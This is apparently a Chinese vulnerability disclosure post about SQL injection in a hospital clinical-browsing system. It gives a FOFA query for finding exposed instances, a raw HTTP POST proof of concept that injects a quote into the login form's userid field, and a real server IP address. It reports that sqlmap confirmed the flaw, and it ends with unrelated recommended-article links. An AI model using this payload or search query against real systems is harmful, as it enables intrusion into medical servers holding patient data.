蓝网科技临床浏览系统存在SQL注入漏洞

马船长2024-11-25 8:22

漏洞描述

蓝网科技临床浏览系统是一个专门用于医疗行业的软件系统,主要用于医生、护士和其他医疗专业人员在临床工作中进行信息浏览、查询和管理。在deleteStudy.php中的接口处存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息,例如添加、删除或修改记录,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。

FOFA

title="临床浏览"

漏洞复现

POC

POST /login.php HTTP/1.1
Host: 
Content-Length: 39
Cache-Control: max-age=0
Origin: http://106.3.96.36:82
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://106.3.96.36:82/login.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=rst1vmi4v952mkv1qe6hfia6b3
Connection: keep-alive

userid=admin'&password=11111111&submit=

bp报错

sqlmap确认有漏洞

相关推荐
m0_7482546615 分钟前
完美解决phpstudy安装后mysql无法启动
数据库·mysql
Atlim19 分钟前
flink cdc使用flink sql方式运行一直报Make sure a planner module is on the classpath
大数据·sql·flink
时雨h2 小时前
30天面试打卡计划 2024-12-25 26 27 面试题
java·开发语言·数据库
唐天下文化3 小时前
绿葆自助取袋机:以科技之力,共筑绿色医疗新风尚
科技
资讯分享周4 小时前
Soul App创始人张璐团队以科技守护真实,净化网络社交环境
科技
TDengine (老段)4 小时前
TDengine 新功能 VARBINARY 数据类型
大数据·c语言·数据库·时序数据库·tdengine·涛思数据
yuenblue6 小时前
什么是ondelete cascade以及使用sqlite演示ondelete cascade使用案例
数据库·sqlite
howard_shooter6 小时前
Oracle Managed Files(OMF)
数据库·oracle
yangfeipancc7 小时前
数据库-用户管理
android·数据库
两点王爷9 小时前
Java读取csv文件内容,保存到sqlite数据库中
java·数据库·sqlite·csv
热门推荐
01docker安装启动问题解决排查02组基轨迹建模 GBTM的介绍与实现(Stata 或 R)03玄机平台应急响应—webshell查杀04Gitlab ci/cd05【一文读懂】NTN(非地面网络)技术介绍06HCIA-datacom数通题库和录播视频资料07新手学习VR全景需要知道的几个问题08RAG 实践- Ollama+RagFlow 部署本地知识库09优化手机性能,解决卡顿问题:关闭这3个微信开关,释放内存空间10分布式训练原理总结(DP、PP、TP 、ZeRO)